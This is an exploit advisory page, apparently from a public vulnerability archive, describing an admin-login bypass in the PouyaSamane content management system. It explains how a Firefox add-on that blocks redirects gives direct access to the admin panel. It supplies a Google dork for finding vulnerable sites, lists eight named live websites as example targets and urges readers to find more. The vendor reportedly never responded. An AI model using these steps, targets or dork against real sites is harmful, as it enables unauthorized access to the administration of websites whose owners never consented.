PouyaSamane EL - AdminBypass(NoRedirect)

2016.11.18
ir Blackwolf_Iran (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"طراحی و پشتیبانی : پویاسامانه"

~Exploit title : PouyaSamane EL - AdminBypass(NoRedirect) ~Exploit Author : Blackwolf_Iran ~Email: Blackwolf@post.com ~MyHome : http://iranonymous.org http://exdb.iranonymous.org ~VendorHomePage : http://pouyaserver.net ~Tested On : win 8.1 ~Note: Download Tool [NoRedirect] On addons Mozilla Firefox ~with this tool we can byp admin login. ~Dork: intext:"طراحی و پشتیبانی : پویاسامانه" ~Date: Thursday, November 17, 2016 ~Report Bug To Vendor: No Answer --------------------------------------------- Descriptions : ~http://localhost:8080/admin/login.php => add this URL in NoRedirect ~Then Go to => http://localhost:80/admin/index.php ~seccesfully Exploited... --------------------------------------------- ~Examples : 1. http://www.genavehpress.ir/admin/index.php 2. http://khargkhabar.ir/admin/index.php 3. http://www.asredeylam.ir/admin/index.php 4. http://jamkhabar.ir/admin/index.php 5. http://pouyaserver.net/admin/index.php 6. http://gamnews.ir/admin/index.php 7. http://pgnews.ir/admin/index.php 8. http://kiaparvazlian.com//admin/index.php You Can Find a lot of targets with dork in google... --------------------------------------------- Tnx : Turk-Hacker(Hacker Khan) - Mr.Khatar - Ormazd - Virus32(mamad khodemon) - Sadegh - Mozafar - alireza22 - and All My Friends.


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top